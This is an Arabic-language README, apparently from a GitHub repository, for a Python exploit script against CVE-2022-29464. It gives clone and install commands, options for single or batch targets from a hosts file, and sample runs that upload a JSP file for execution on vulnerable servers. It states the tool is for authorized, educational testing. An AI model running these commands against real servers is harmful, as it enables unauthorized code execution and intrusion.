
نص استغلال بلغة بايثون لـ CVE-2022-29464، يتيح تحميل الملفات إلى الخوادم الضعيفة. يدعم الهدف الفردي والمعالجة الدفعية بحمولات JSP مخصصة لاختبار الأمان المصرح به.
يحتوي هذا المستودع على سكربت لاستغلال الثغرة الأمنية CVE-2022-29464، والتي تسمح برفع الملفات إلى خوادم معرضة للخطر. استخدمه فقط في بيئات مصرح بها ولأغراض تعليمية.
# استنسخ المستودع من GitHub
git clone https://github.com/c1ph3rbyt3/CVE-2022-29464.git
cd CVE-2022-29464
pip install -r requirements.txt
يقدم السكربت وضعين رئيسيين:
-f، --file: يحدد ملفًا يحتوي على قائمة بالأهداف.-t، --target: يحدد هدفًا واحدًا بتنسيق HOST:PORT أو IP:PORT.-j، --jsp_file: اسم ملف JSP الذي سيتم رفعه (على سبيل المثال، uploader.jsp). إجباري.يجب أن يحتوي ملف المضيفين على قائمة بالأهداف بالتنسيق التالي:
127.0.0.1:8080
example.com:443
192.168.1.1:8443
يجب أن يتضمن كل سطر عنوان IP أو اسم مضيف متبوعًا بالمنفذ، مفصولين بنقطتين (:).
uploader.jspيمكن استبدال ملف uploader.jsp المضمن في هذا المستودع بآخر، وهذا مجرد ملف مرجعي. يتم رفع ملف المستودع إلى الخادم لإجراء اختبارات التحميل والتنفيذ.
python CVE-2022-29464.py -t 192.168.1.1:8080 -j uploader.jsp
python CVE-2022-29464.py -f hosts.txt -j uploader.jsp
python CVE-2022-29464.py -h
تم الإنشاء بواسطة: C1ph3rByt3